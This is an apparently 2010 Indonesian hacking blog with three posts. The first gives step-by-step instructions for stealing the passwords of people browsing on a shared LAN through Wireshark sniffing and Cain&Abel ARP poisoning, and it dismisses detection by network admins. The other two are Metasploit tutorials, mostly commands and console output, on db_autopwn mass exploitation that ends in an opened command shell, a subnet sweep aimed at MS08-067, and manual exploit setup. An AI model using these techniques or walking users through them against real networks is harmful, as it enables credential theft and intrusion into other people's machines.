Kamis, 05 Agustus 2010

Cara hacking via LAN (untuk curi pass orang2 yang lagi browsing)

Pertama-tama sorry kalo repost karena teknik ini bukanlah teknik yang fresh di dunia hacking tapi teknik ini belum basi karena sampai saat ini masih dapat digunakan karena sebagian besar jaringan meggunakan jaringan hub & switch yang tidak terenkripsi.
Mengapa tidak terenkripsi?

* Network Admin sebagian besar adalah orang IT yang specialist dalam membuat program, bukan dalam Network Security
* Bila dienkripsi bandwidth yang dibuthkan akan meningkat dan tentu inet yang sudah lemot ini akan semakin lemot dan akhirnya page error
* Harganya tidak murah untuk memperoleh yang terenkripsi

Perbedaan antara jaringan Hub dan Switch:

* Pada jaringan hub semua data yang mengalir di jaringan dapat dilihat/diambil oleh komputer manapun yang ada di jaringan asalakan komputer tersebut merequest data tersebut, kalo tidak direquest ya tidak akan datang.
* Pada jaringan switch hanya komputer yang melakukan pertukaran data yang dapat melihat data tersebut, komputer2 lain tidak berhak merequest data tersebut.

Masalahnya adalah harga dari router hub dan switch tidak berbeda jauh sehingga kebanyakan tempat sekarang sudah menggunakan metode switch yang menyulitkan untuk network hacking.
Hacking ini menggunakan teknik:

* Sniffing
* ARP Poison Routing
Kedua Teknik di atas tidak akan bisa dicegah oleh firewall apapun di komputer korban, dijamin.

Important Note: ARP Poison Routing dapat meyebabkan denial of service (dos) pada salah satu / semua komputer pada network anda

Kelebihan:

* Tidak akan terdeteksi oleh firewall tipe dan seri apapun karena kelemahannya terletak pada sistem jaringan bukan pada komputernya
* Bisa mencuri semua jenis login password yang melalui server HTTP
* Bisa mencuri semua login password orang yang ada di jaringan Hub selama program diaktifkan
* Untuk ARP Poisoning bisa digunakan untuk mencuri password di HTTPS
* Semua programnya free

Kekurangan:

* Untuk jaringan Switch harus di ARP poisoning 1 persatu dan bandwidth anda akan termakan banyak untuk hal itu (kalo inet super cepat ga masalah)
* Ketahuan / tidak oleh admin jaringan di luar tanggung jawab saya

Mulai dari sini anggap bahwa di network dalam kisah ini ada 3 komputer, yaitu:

* Komputer Korban
* Komputer Hacker
* Server

Perbedaan-perbedaan antara jaringan switch dan jaringan hub:
Langkah-langkah pertama:

1. Cek tipe jaringan anda, anda ada di jaringan switch / hub. Jika anda berada di jaringan hub bersyukurlah karena proses hacking anda akan jauh lebih mudah.
2. Download program-program yang dibutuhkan yaitu Wireshark dan Cain&Abel.

Download Disini:

Download Wireshark

Download Netstumbler

Cara Menggunakan WireShark:

* Jalankan program wireshark
* Tekan tombol Ctrl+k (klik capture lalu option)
* Pastikan isi pada Interfacenya adalah Ethernet Card anda yang menuju ke jaringan,
bila bukan ganti dan pastikan pula bahwa “Capture packets in promiscuous mode” on
* Klik tombol start
* Klik tombol stop setelah anda merasa yakin bahwa ada password yang masuk selama anda menekan tombol start
* Anda bisa melihat semua jenis packet yang masuk dan keluar di jaringan (atau pada komputer anda saja jika network anda menggunakan Swtich
* Untuk menganalisis datanya klik kanan pada data yang ingin di analisis lalu klik “Follow TCP Stream” dan selamat menganalisis paketnya (saya tidak akan menjelaskan caranya karena saya tidak bisa )
* Yang jelas dari data itu pasti di dalamnya terdapat informasi2 yang dimasukkan korban ke website dan sebaliknya

Cara di atas hanya berlaku apabila jaringan anda adalah Hub bukan switch
Dari cara di atas anda dapat mengetahui bahwa jaringan anda adalah hub/switch dengan melihat pada kolom IP Source dan IP Destination. Bila pada setiap baris salah satu dari keduanya merupakan ip anda maka dapat dipastikan jaringan anda adalah jaringan switch, bila tidak ya berarti sebaliknya.
Cara Menggunakan Cain&Abel:

* Penggunaan program ini jauh lebih mudah dan simple daripada menggunakan wireshark, tetapi bila anda menginginkan semua packet yang sudah keluar dan masuk disarankan anda menggunakan program wireshark
* Buka program Cain anda
* Klik pada bagian configure
* Pada bagian “Sniffer” pilih ethernet card yang akan anda gunakan
* Pada bagian “HTTP Fields” anda harus menambahkan username fields dan password fields nya apabila yang anda inginkan tidak ada di daftar.

Sebagai contoh saya akan beritahukan bahwa kalo anda mau hack password Friendster anda harus menambahkan di username fields dan passworsd fields kata name, untuk yang lain anda bisa mencarinya dengan menekan klik kanan view source dan anda harus mencari variabel input dari login dan password website tersebut. Yang sudah ada di defaultnya rasanyan sudah cukup lengkap, anda dapat mencuri pass yang ada di klubmentari tanpa menambah apapun.

* Setelah itu apply settingannya dan klik ok
* Di menu utama terdapat 8 tab, dan yang akan dibahas hanya 1 tab yaitu tab “Sniffer” karena itu pilih lah tab tersebut dan jangan pindah2 dari tab tersebut untuk mencegah kebingungan anda sendiri
* Aktifkan Sniffer dengan cara klik tombol sniffer yang ada di atas tab2 tersebut, carilah tombol yang tulisannya “Start/Stop Sniffer”
* Bila anda ada di jaringan hub saat ini anda sudah bisa mengetahui password yang masuk dengan cara klik tab (Kali ini tab yang ada di bawah bukan yang di tengah, yang ditengah sudah tidak usah diklik-klik lagi) “Passwords”
* Anda tinggal memilih password dari koneksi mana yang ingin anda lihat akan sudah terdaftar di sana
* Bila anda ternyata ada di jaringan switch, ini membutuhkan perjuangan lebih, anda harus mengaktifkan APR yang tombolonya ada di sebelah kanan Sniffer (Dan ini tidak dijamin berhasil karena manage dari switch jauh lebih lengkap&secure dari hub)
* Sebelum diaktifkan pada tab sniffer yang bagian bawah pilih APR
* Akan terlihat 2 buah list yang masih kosong, klik list kosong bagian atas kemudian klik tombol “+” (Bentuknya seperti itu) yang ada di jajaran tombol sniffer APR dll
* Akan ada 2 buah field yang berisi semua host yang ada di jaringan anda
* Hubungkan antara alamat ip korban dan alamat ip gateway server (untuk mengetahui alamat gateway server klik start pada komp anda pilih run ketik cmd lalu ketik ipconfig pada command prompt)
* Setelah itu baru aktifkan APR, dan semua data dari komp korban ke server dapat anda lihat dengan cara yang sama.

Anda dapat menjalankan kedua program di atas secara bersamaan (Cain untuk APR dan wireshark untuk packet sniffing) bila ingin hasil yang lebih maksimal.
Password yang bisa anda curi adalah password yang ada di server HTTP (server yang tidak terenkripsi), bila data tersebut ada di server yang terenkripsi maka anda harus mendekripsi data tersebut sebelum memperoleh passwordnya (dan itu akan membutuhkan langkah2 yang jauh lebih panjang dari cara hack ini)
Untuk istilah-istilah yang tidak ngerti bisa dicari di wikipedia (tapi yang inggris ya kalo yang indo jg belum tentu ada).
Masukan ini dipos pada September 26, 2009 11:06 am dan disimpan padaHacking . Anda dapat mengikuti semua aliran respons RSS 2.0 dari masukan ini Anda dapat memberikan tanggapan, atau trackback dari situs anda.

Senin, 02 Agustus 2010

Belajar Metasploit II : Mass Exploitation

Artikel ini merupakan lanjutan dari artikel sebelumnya yaitu Metasploit I : Teknik Dasar. Dalam artikel yang kedua ini saya ingin membahas mengenai penggunaan metasploit untuk mass exploitation dengan menggunakan db_autopwn.
Sebelumnya pastikan instalasi metasploit kita sudah terintegrasi terlebih dahulu dengan database (bisa menggunakan MySQL, postgre, ataupun SQLite3) dan nmap. Prosedur instalasinya silahkan anda lihat disini.
Metode mass exploitation pertama yang akan saya gunakan dalam artikel ini menggunakan teknik mass exploit pada satu mesin dengan memanfaatkan vulnerability di seluruh layanan server/port yang terbuka, atau kita istilahkan pendekatan secara vertikal (istilah ini ndak akan ketemu kalo mbuka-mbuka kamus eksploitasi sistem, lha wong istilahnya made in indo hahaha.. ). Model pendekatan yang lain juga akan dicoba (secara singkat) di bawah artikel ini.
Metode mass exploit secara vertikal
Ya dah langsung kita coba aja ke satu mesin yang sudah kita siapkan sebelumnya.

- Jalankan metasploit console dari shell :
    $ sudo msfconsole
    _
                                     | |      o
     _  _  _    _ _|_  __,   ,    _  | |  __    _|_
    / |/ |/ |  |/  |  /  |  / \_|/ \_|/  /  \_|  |
      |  |  |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
                               /|
                               \|
           =[ msf v3.3-dev
    + -- --=[ 359 exploits - 233 payloads
    + -- --=[ 20 encoders - 7 nops
           =[ 132 aux
- Jalankan plugin mysql terlebih dahulu (saya menggunakan mysql database)
    msf > load db_mysql
    [*] Successfully loaded plugin: db_mysql
- Sambungkan metasploit dengan database di MySQL
    msf > db_connect msf:msf@localhost/metasploit msf >
- Scan mesin target menggunakan nmap untuk melihat port yang terbuka.
Hasil scan ini akan tersimpan otomatis kedalam database yang telah disiapkan sebelumnya.
    msf > db_nmap -v -sS 192.168.1.10
    [*] exec: "/usr/bin/nmap" "-v" "-sS" "192.168.1.10" "-oX" "/tmp/dbnmap20090404-13424-19l1thf-0"
    NMAP:
    NMAP: Starting Nmap 4.62 ( http://nmap.org ) at 2009-04-04 17:35 CIT
    NMAP: Initiating ARP Ping Scan at 17:35
    NMAP: Scanning 192.168.1.10 [1 port]
    NMAP: Completed ARP Ping Scan at 17:35, 0.00s elapsed (1 total hosts)
    NMAP: Initiating Parallel DNS resolution of 1 host. at 17:35
    NMAP: Completed Parallel DNS resolution of 1 host. at 17:35, 0.00s elapsed
    NMAP: Initiating SYN Stealth Scan at 17:35
    NMAP: Scanning 192.168.1.10 [1715 ports]
    NMAP: Discovered open port 1723/tcp on 192.168.1.10
    NMAP: Discovered open port 3389/tcp on 192.168.1.10
    NMAP: Discovered open port 139/tcp on 192.168.1.10
    NMAP: Discovered open port 1025/tcp on 192.168.1.10
    NMAP: Discovered open port 1026/tcp on 192.168.1.10
    NMAP: Discovered open port 445/tcp on 192.168.1.10
    NMAP: Discovered open port 1043/tcp on 192.168.1.10
    NMAP: Discovered open port 12345/tcp on 192.168.1.10
    NMAP: Discovered open port 1521/tcp on 192.168.1.10
    NMAP: Discovered open port 135/tcp on 192.168.1.10
    NMAP: Discovered open port 3372/tcp on 192.168.1.10
    NMAP: Discovered open port 1433/tcp on 192.168.1.10
    NMAP: Completed SYN Stealth Scan at 17:35, 0.67s elapsed (1715 total ports)
    NMAP: Host 192.168.1.10 appears to be up ... good.
    NMAP: Interesting ports on 192.168.1.10:
    NMAP: Not shown: 1703 closed ports
    NMAP: PORT      STATE SERVICE
    NMAP: 135/tcp   open  msrpc
    NMAP: 139/tcp   open  netbios-ssn
    NMAP: 445/tcp   open  microsoft-ds
    NMAP: 1025/tcp  open  NFS-or-IIS
    NMAP: 1026/tcp  open  LSA-or-nterm
    NMAP: 1043/tcp  open  boinc
    NMAP: 1433/tcp  open  ms-sql-s
    NMAP: 1521/tcp  open  oracle
    NMAP: 1723/tcp  open  pptp
    NMAP: 3372/tcp  open  msdtc
    NMAP: 3389/tcp  open  ms-term-serv
    NMAP: 12345/tcp open  netbus
    NMAP: MAC Address: 00:1C:C0:50:B9:00 (Intel Corporate)
    NMAP:
    NMAP: Read data files from: /usr/share/nmap
    NMAP: Nmap done: 1 IP address (1 host up) scanned in 0.872 seconds
    NMAP: Raw packets sent: 1716 (75.502KB) | Rcvd: 1716 (78.932KB)
    msf >
- Untuk mengetahui opsi-opsi db_autopwn, bisa dilihat terlebih dahulu dari menu help-nya. Silahkan anda coba dan pelajari opsi-opsi tersebut dengan berbagai kombinasi yang anda inginkan
    msf > db_autopwn -h
    [*] Usage: db_autopwn [options]
     -h          Display this help text
     -t          Show all matching exploit modules
     -x          Select modules based on vulnerability references
     -p          Select modules based on open ports
     -e          Launch exploits against all matched targets
     -r          Use a reverse connect shell
     -b          Use a bind shell on a random port
     -q          Disbale exploit module output
     -I  [range] Only exploit hosts inside this range
     -X  [range] Always exclude hosts inside this range
     -PI [range] Only exploit hosts with these ports open
     -PX [range] Always exclude hosts with these ports open
     -m  [regex] Only run modules whose name matches the regex
    msf >
- db_autopwn akan kita jalankan menggunakan modul-modul exploit yang sesuai dengan port-port yang sebelumnya telah tersimpan di database
    msf > db_autopwn -p -t
    [*] Analysis completed in 6.07385802268982 seconds (0 vulns / 0 refs)
    [*] Matched auxiliary/dos/windows/smb/rras_vls_null_deref against 192.168.1.10:445...
    [*] Matched auxiliary/admin/mssql/mssql_exec against 192.168.1.10:1433...
    [*] Matched exploit/windows/smb/ms05_039_pnp against 192.168.1.10:445...
    [*] Matched auxiliary/admin/db2/db2rcmd against 192.168.1.10:445...
    [*] Matched auxiliary/scanner/mssql/mssql_login against 192.168.1.10:1433...
    [*] Matched auxiliary/dos/windows/smb/ms06_063_trans against 192.168.1.10:445...
    [*] Matched exploit/windows/smb/ms06_025_rasmans_reg against 192.168.1.10:445...
    [*] Matched auxiliary/scanner/smb/login against 192.168.1.10:445...
    [*] Matched auxiliary/dos/windows/smb/ms05_047_pnp against 192.168.1.10:445...
    [*] Matched auxiliary/dos/samba/lsa_transnames_heap against 192.168.1.10:445...
    [*] Matched exploit/windows/smb/ms06_025_rras against 192.168.1.10:445...
    [*] Matched auxiliary/dos/samba/lsa_addprivs_heap against 192.168.1.10:445...
    [*] Matched exploit/windows/smb/psexec against 192.168.1.10:445...
    [*] Matched exploit/windows/smb/ms06_066_nwapi against 192.168.1.10:445...
    [*] Matched exploit/windows/smb/ms06_040_netapi against 192.168.1.10:445...
    [*] Matched exploit/windows/smb/ms04_011_lsass against 192.168.1.10:445...
    [*] Matched exploit/windows/smb/ms03_049_netapi against 192.168.1.10:445...
    [*] Matched exploit/windows/dcerpc/ms03_026_dcom against 192.168.1.10:135...
    [*] Matched exploit/solaris/samba/lsa_transnames_heap against 192.168.1.10:445...
    [*] Matched exploit/multi/samba/nttrans against 192.168.1.10:139...
    [*] Matched auxiliary/dos/windows/smb/vista_negotiate_stop against 192.168.1.10:445...
    [*] Matched auxiliary/dos/windows/smb/ms09_001_write against 192.168.1.10:445...
    [*] Matched exploit/windows/smb/ms08_067_netapi against 192.168.1.10:445...
    [*] Matched exploit/windows/smb/ms04_031_netdde against 192.168.1.10:445...
    [*] Matched exploit/windows/smb/msdns_zonename against 192.168.1.10:445...
    [*] Matched exploit/linux/pptp/poptop_negative_read against 192.168.1.10:1723...
    [*] Matched exploit/windows/brightstor/etrust_itm_alert against 192.168.1.10:445...
    [*] Matched exploit/solaris/samba/trans2open against 192.168.1.10:139...
    [*] Matched exploit/osx/samba/trans2open against 192.168.1.10:139...
    [*] Matched exploit/osx/samba/lsa_transnames_heap against 192.168.1.10:445...
    [*] Matched exploit/netware/smb/lsass_cifs against 192.168.1.10:445...
    [*] Matched auxiliary/scanner/dcerpc/management against 192.168.1.10:135...
    [*] Matched auxiliary/scanner/dcerpc/endpoint_mapper against 192.168.1.10:135...
    [*] Matched exploit/windows/smb/ms06_066_nwwks against 192.168.1.10:445...
    [*] Matched exploit/windows/mssql/ms02_056_hello against 192.168.1.10:1433...
    [*] Matched exploit/linux/samba/lsa_transnames_heap against 192.168.1.10:445...
    [*] Matched auxiliary/dos/windows/smb/ms06_035_mailslot against 192.168.1.10:445...
    [*] Matched auxiliary/admin/mssql/mssql_sql against 192.168.1.10:1433...
    [*] Matched exploit/windows/smb/ms04_007_killbill against 192.168.1.10:445...
    msf >
- Lakukan exploitasi system dengan menambahkan opsi -e :
    msf > db_autopwn -p -t -e
    [*] Analysis completed in 6.27089881896973 seconds (0 vulns / 0 refs)
    [*] Matched auxiliary/dos/windows/smb/rras_vls_null_deref against 192.168.1.10:445...
    [*] Matched auxiliary/admin/mssql/mssql_exec against 192.168.1.10:1433...
    [*] Matched exploit/windows/smb/ms05_039_pnp against 192.168.1.10:445...
    [*] (3/39): Launching exploit/windows/smb/ms05_039_pnp against 192.168.1.10:445...
    [-] Exploit failed: Anonymous modules have no name to be referenced by
    [*] Matched auxiliary/admin/db2/db2rcmd against 192.168.1.10:445...
    [*] Matched auxiliary/scanner/mssql/mssql_login against 192.168.1.10:1433...
    [*] Matched auxiliary/dos/windows/smb/ms06_063_trans against 192.168.1.10:445...
    [*] Matched exploit/windows/smb/ms06_025_rasmans_reg against 192.168.1.10:445...
    [*] Matched auxiliary/scanner/smb/login against 192.168.1.10:445...
    [*] Matched auxiliary/dos/windows/smb/ms05_047_pnp against 192.168.1.10:445...
    [*] Matched auxiliary/dos/samba/lsa_transnames_heap against 192.168.1.10:445...
    [*] Matched exploit/windows/smb/ms06_025_rras against 192.168.1.10:445...
    [*] Matched auxiliary/dos/samba/lsa_addprivs_heap against 192.168.1.10:445...
    [*] Matched exploit/windows/smb/psexec against 192.168.1.10:445...
    [*] (13/39): Launching exploit/windows/smb/psexec against 192.168.1.10:445...
    [*] Matched exploit/windows/smb/ms06_066_nwapi against 192.168.1.10:445...
    [*] (14/39): Launching exploit/windows/smb/ms06_066_nwapi against 192.168.1.10:445...
    [*] Started bind handler
    [-] Exploit failed: No encoders encoded the buffer successfully.
    [*] Connecting to the server...
    [*] Matched exploit/windows/smb/ms06_040_netapi against 192.168.1.10:445...
    [*] Authenticating as user 'Administrator'...
    [*] (15/39): Launching exploit/windows/smb/ms06_040_netapi against 192.168.1.10:445...
    [-] Exploit failed: Anonymous modules have no name to be referenced by
    [*] Matched exploit/windows/smb/ms04_011_lsass against 192.168.1.10:445...
    [*] (16/39): Launching exploit/windows/smb/ms04_011_lsass against 192.168.1.10:445...
    [-] Exploit failed: Anonymous modules have no name to be referenced by
    [-] Exploit failed: Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0)
    [*] Matched exploit/windows/smb/ms03_049_netapi against 192.168.1.10:445...
    [*] (17/39): Launching exploit/windows/smb/ms03_049_netapi against 192.168.1.10:445...
    [-] Exploit failed: Anonymous modules have no name to be referenced by
    [*] Matched exploit/windows/dcerpc/ms03_026_dcom against 192.168.1.10:135...
    [*] (18/39): Launching exploit/windows/dcerpc/ms03_026_dcom against 192.168.1.10:135...
    [-] Exploit failed: Anonymous modules have no name to be referenced by
    [*] Matched exploit/solaris/samba/lsa_transnames_heap against 192.168.1.10:445...
    [*] (19/39): Launching exploit/solaris/samba/lsa_transnames_heap against 192.168.1.10:445...
    [-] Exploit failed: Anonymous modules have no name to be referenced by
    [*] Matched exploit/multi/samba/nttrans against 192.168.1.10:139...
    [*] (20/39): Launching exploit/multi/samba/nttrans against 192.168.1.10:139...
    [*] Matched auxiliary/dos/windows/smb/vista_negotiate_stop against 192.168.1.10:445...
    [*] Matched auxiliary/dos/windows/smb/ms09_001_write against 192.168.1.10:445...
    [*] Matched exploit/windows/smb/ms08_067_netapi against 192.168.1.10:445...
    [*] (23/39): Launching exploit/windows/smb/ms08_067_netapi against 192.168.1.10:445...
    [-] Exploit failed: Anonymous modules have no name to be referenced by
    [*] Matched exploit/windows/smb/ms04_031_netdde against 192.168.1.10:445...
    [*] (24/39): Launching exploit/windows/smb/ms04_031_netdde against 192.168.1.10:445...
    [-] Exploit failed: Anonymous modules have no name to be referenced by
    [*] Matched exploit/windows/smb/msdns_zonename against 192.168.1.10:445...
    [*] (25/39): Launching exploit/windows/smb/msdns_zonename against 192.168.1.10:445...
    [-] Exploit failed: Anonymous modules have no name to be referenced by
    [*] Matched exploit/linux/pptp/poptop_negative_read against 192.168.1.10:1723...
    [*] (26/39): Launching exploit/linux/pptp/poptop_negative_read against 192.168.1.10:1723...
    [-] Exploit failed: wrong number of arguments (1 for 0)
    [*] Matched exploit/windows/brightstor/etrust_itm_alert against 192.168.1.10:445...
    [*] (27/39): Launching exploit/windows/brightstor/etrust_itm_alert against 192.168.1.10:445...
    [-] Exploit failed: Anonymous modules have no name to be referenced by
    [*] Matched exploit/solaris/samba/trans2open against 192.168.1.10:139...
    [*] (28/39): Launching exploit/solaris/samba/trans2open against 192.168.1.10:139...
    [*] Matched exploit/osx/samba/trans2open against 192.168.1.10:139...
    [*] Matched exploit/osx/samba/lsa_transnames_heap against 192.168.1.10:445...
    [*] (30/39): Launching exploit/osx/samba/lsa_transnames_heap against 192.168.1.10:445...
    [*] Started bind handler
    [*] Binding to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.1.10[\lsarpc]...
    [*] Bound to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.1.10[\lsarpc]...
    [*] Getting OS information...
    [*] Trying to exploit Windows 5.1
    [*] Fingerprint: Windows XP Service Pack 2 - lang:English
    [*] Selected Target: Windows XP SP2 English (NX)
    [*] Server appears to have been patched
    [*] Triggering the vulnerability...
    [*] Command shell session 1 opened (192.168.1.6:46451 -> 192.168.1.10:29595)
    [*] Matched exploit/netware/smb/lsass_cifs against 192.168.1.10:445...
    [*] (31/39): Launching exploit/netware/smb/lsass_cifs against 192.168.1.10:445...
    [*] Matched auxiliary/scanner/dcerpc/management against 192.168.1.10:135...
    [*] Matched auxiliary/scanner/dcerpc/endpoint_mapper against 192.168.1.10:135...
    [*] Matched exploit/windows/smb/ms06_066_nwwks against 192.168.1.10:445...
    [*] (34/39): Launching exploit/windows/smb/ms06_066_nwwks against 192.168.1.10:445...
    [-] Exploit failed: Anonymous modules have no name to be referenced by
    [*] Matched exploit/windows/mssql/ms02_056_hello against 192.168.1.10:1433...
    [*] (35/39): Launching exploit/windows/mssql/ms02_056_hello against 192.168.1.10:1433...
    [-] Exploit failed: Anonymous modules have no name to be referenced by
    [*] Matched exploit/linux/samba/lsa_transnames_heap against 192.168.1.10:445...
    [*] Matched auxiliary/dos/windows/smb/ms06_035_mailslot against 192.168.1.10:445...
    [*] Matched auxiliary/admin/mssql/mssql_sql against 192.168.1.10:1433...
    [*] Matched exploit/windows/smb/ms04_007_killbill against 192.168.1.10:445...
    msf >
- Eksploitasi telah selesai. Periksa session yang aktif dengan menuliskan perintah session -l. Apabila ada message no active session berarti eksploitasi yang kita lakukan gagal.
    msf > sessions -l
    Active sessions
    ===============
      Id  Description    Tunnel
      --  -----------    ------
      1   Command shell  192.168.1.6:46451 -> 192.168.1.10:29595
- Dari message diatas diketahui eksploitasi telah berhasil dilakukan dan ada 1 sesi yang aktif, yaitu session dengan id 1. Untuk berinteraksi dengan session yang aktif :
    msf > sessions -i 1
    [*] Starting interaction with 1...
    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.
    C:\WINDOWS\system32>
    C:\WINDOWS\system32>ipconfig
    ipconfig
    Windows IP Configuration
    Ethernet adapter Local Area Connection:
            Connection-specific DNS Suffix  . :
            IP Address. . . . . . . . . . . . : 192.168.1.10
            Subnet Mask . . . . . . . . . . . : 255.255.255.0
            Default Gateway . . . . . . . . . : 192.168.1.254
    C:\WINDOWS\system32>
Owned… !!
Metode mass exploit secara horisontal / linier
Sebenarnya cara yang dipakai dalam metode ini sama dengan metode sebelumnya, yang membedakan adalah model pencarian port yang terbuka. Cara ini lebih fokus kepada pencarian kelemahan sistem pada port tertentu dalam suatu network. Jadi yang pegang peranan dalam pemilihan metode ini sebenarnya adalah pada kustomisasi command di nmap. Contoh paling mudah yaitu memanfaatkan exploit MS Windows MS08-067 seperti artikel terdahulu. Test case kali ini memanfaatkan exploit tersebut di dalam network lokal saya : 192.168.1.0/24.
Silahkan anda ikuti saja tutorial seperti metode yang diatas hanya saja command pencarian port yang terbuka diubah menjadi :
    msf > nmap -sS -p 445 -n -T Aggressive 192.168.1.0/24
    [*] exec: nmap -sS -p 445 -n -T Aggressive 192.168.1.0/24
    Starting Nmap 4.62 ( http://nmap.org ) at 2009-04-05 17:06 CIT
    Interesting ports on 192.168.1.6:
    PORT    STATE  SERVICE
    445/tcp closed microsoft-ds
    Interesting ports on 192.168.1.10:
    PORT    STATE SERVICE
    445/tcp open  microsoft-ds
    MAC Address: 00:1C:C0:50:B9:00 (Intel Corporate)
    Interesting ports on 192.168.1.12:
    PORT    STATE SERVICE
    445/tcp open  microsoft-ds
    MAC Address: 00:11:2F:A6:03:9F (Asustek Computer)
    Interesting ports on 192.168.1.20:
    PORT    STATE SERVICE
    445/tcp open  microsoft-ds
    MAC Address: 00:1E:8C:CC:07:2A (Asustek Computer)
    Interesting ports on 192.168.1.26:
    PORT    STATE SERVICE
    445/tcp open  microsoft-ds
    MAC Address: 00:04:23:6E:EC:AD (Intel)
    Interesting ports on 192.168.1.28:
    PORT    STATE SERVICE
    445/tcp open  microsoft-ds
    MAC Address: 00:1E:8C:67:59:F9 (Asustek Computer)
    Interesting ports on 192.168.1.30:
    PORT    STATE SERVICE
    445/tcp open  microsoft-ds
    MAC Address: 00:1E:EC:79:94:F7 (Compal Information (kunshan) CO.)
    Interesting ports on 192.168.1.103:
    PORT    STATE SERVICE
    445/tcp open  microsoft-ds
    MAC Address: 00:18:DE:07:3D:91 (Intel)
    Interesting ports on 192.168.1.254:
    PORT    STATE  SERVICE
    445/tcp closed microsoft-ds
    MAC Address: 00:1D:7E:27:BA:E6 (Cisco-Linksys)
    Nmap done: 256 IP addresses (9 hosts up) scanned in 2.566 seconds
    msf >
Apabila anda masih mengalami kesulitan dalam menerapkan metode ini, silahkan anda baca artikel yang juga sudah lengkap dengan step by step-nya dari blog temen-temen kecoak disini atau blognya pakde HDM disini.
Nah… sekarang coba anda bayangkan, gimana kalo kedua metode tersebut digabung? Dalam artian melakukan scaning ke SEMUA port terbuka dalam suatu network? Atau malah scanning ke network berkelas A.. Silahkan anda bayangkan sendiri.. :D
Kalo bayangan saya ya kompi anda pasti hang apalagi kalo resource hardwarenya pas-pasan kaya saya ini hehehe.. Atau malah lebih sadis lagi kalo anda gunakan untuk scanning di internet bisa-bisa diblokir ma ISP-nya haha….
Sebenarnya teknik-teknik ini kurang bagus, karena eksploitasi yang dilakukan tergolong ngawor, karena dengan hanya ber-ASUMSI pada port terbuka, maka db_autopwn akan menjalankan SEMUA modul yang ada dengan spesifikasi port tersebut, ndak peduli modul yang dipanggil relevan apa tidak dengan vulner/sistem yang terkait.
Supaya eksploitasi sistem lebih fokus dan terarah dapat juga menggunakan tools nessus, karena kita dapat memanfaatkan cross referencing mode (opsi -x) di db_autopwn.

Belajar Metasploit I : Teknik Dasar

Metasploit : msfconsole

Lets go.. pertama kali kita coba dengan testing manual menggunakan metasploit console (msfconsole) yang mana test ini dilakukan pada single mesin windows xp sp2 dengan melakukan percoban exploit ms windows MS08-067 yaitu vulner pada microsoft windows di port 445 beberapa waktu yang lalu yang sempet bikin microsoft kelimpungan :D . Dari terminal console ketik perintah berikut, seperti pada gambar dibawah:
$ msfconsole

Metasploit

Untuk perintah-perintah lainnya bisa dipelajari dengan mengetikkan help :

    msf > help
    Core Commands
    =============

    Command Description
    ------- -----------
    ? Help menu
    back Move back from the current context
    banner Display an awesome metasploit banner
    cd Change the current working directory
    connect Communicate with a host
    exit Exit the console
    help Help menu
    info Displays information about one or more module
    irb Drop into irb scripting mode
    jobs Displays and manages jobs
    load Load a framework plugin
    loadpath Searches for and loads modules from a path
    quit Exit the console
    resource Run the commands stored in a file
    route Route traffic through a session
    save Saves the active datastores
    search Searches module names and descriptions
    sessions Dump session listings and display information about sessions
    set Sets a variable to a value
    setg Sets a global variable to a value
    show Displays modules of a given type, or all modules
    sleep Do nothing for the specified number of seconds
    unload Unload a framework plugin
    unset Unsets one or more variables
    unsetg Unsets one or more global variables
    use Selects a module by name
    version Show the framework and console library version numbers

Untuk melihat list exploits-nya , gunakan perintah :

    msf > show exploits

List seluruh exploit yang ada kira-kira seperti ini (saya paste sebagian saja biar ndak terlalu panjang) :

    windows/smb/ms05_039_pnp              Microsoft Plug and Play Service Overflow
    windows/smb/ms06_025_rasmans_reg Microsoft RRAS Service RASMAN Registry Overflow
    windows/smb/ms06_025_rras Microsoft RRAS Service Overflow
    windows/smb/ms06_040_netapi Microsoft Server Service NetpwPathCanonicalize Overflow
    windows/smb/ms06_066_nwapi Microsoft Services MS06-066 nwapi32.dll
    windows/smb/ms06_066_nwwks Microsoft Services MS06-066 nwwks.dll
    windows/smb/ms08_067_netapi Microsoft Server Service Relative Path Stack Corruption

Scan mesin target menggunakan nmap. Dalam contoh kasus kali ini kita gunakan kompi dg ip 192.168.1.28 :

    msf > sudo nmap -v -sS -A -O 192.168.1.28
    [*] exec: sudo nmap -v -sS -A -O 192.168.1.28
    [sudo] password for test:Starting Nmap 4.62 ( http://nmap.org ) at 2009-03-21 23:50 CIT
    Initiating ARP Ping Scan at 23:50
    Scanning 192.168.1.28 [1 port]
    Host 192.168.1.28 appears to be up ... good.
    Interesting ports on 192.168.1.28:
    Not shown: 1712 closed ports
    PORT STATE SERVICE VERSION
    135/tcp open msrpc Microsoft Windows RPC
    139/tcp open netbios-ssn
    445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
    MAC Address: 00:1E:8C:67:59:F9 (Asustek Computer)
    Device type: general purpose
    Running: Microsoft Windows XP
    OS details: Microsoft Windows 2000 SP4, or Windows XP SP2 or SP3
    Network Distance: 1 hop
    TCP Sequence Prediction: Difficulty=258 (Good luck!)
    IP ID Sequence Generation: Incremental
    Service Info: OS: Windows

Dari hasil scan kita ketahui bahwa kemungkinan OS-nya menggunakan OS Windows XP dengan port 445-nya terbuka. Mari kita coba kompi ini dengan menggunakan exploit windows/smb/ms08_067_netapi.

    msf > use windows/smb/ms08_067_netapi
    msf exploit(ms08_067_netapi) >

Lihat opsi dari exploit ini dengan mengetikkan show options :

    msf exploit(ms08_067_netapi) > show options
    Module options:
    Name Current Setting Required Description
    ---- --------------- -------- -----------
    RHOST yes The target address
    RPORT 445 yes Set the SMB service port
    SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

    Exploit target:
    Id Name
    -- ----
    0 Automatic Targeting

Dari opsi diatas, maka kita perlu set terlebih dahulu RHOST ( komputer target) dengan mengetikkan :

    msf exploit(ms08_067_netapi) > set rhost 192.168.1.28
    rhost => 192.168.1.28

Untuk RPORT, kita tidak perlu melakukan setting apa-apa karena vulnerability ini memang mengeksploitasi vulnerability di port 445. Untuk exploit target diisi dengan OS komputer target. Dalam langkah ini kita menggunakan angka 0 yang berarti automatic target. Untuk melihat OS target apa saja, ketik :

    msf exploit(ms08_067_netapi) > show targets
    Exploit targets:
    Id Name
    -- ----
    0 Automatic Targeting
    1 Windows 2000 Universal
    2 Windows XP SP0/SP1 Universal
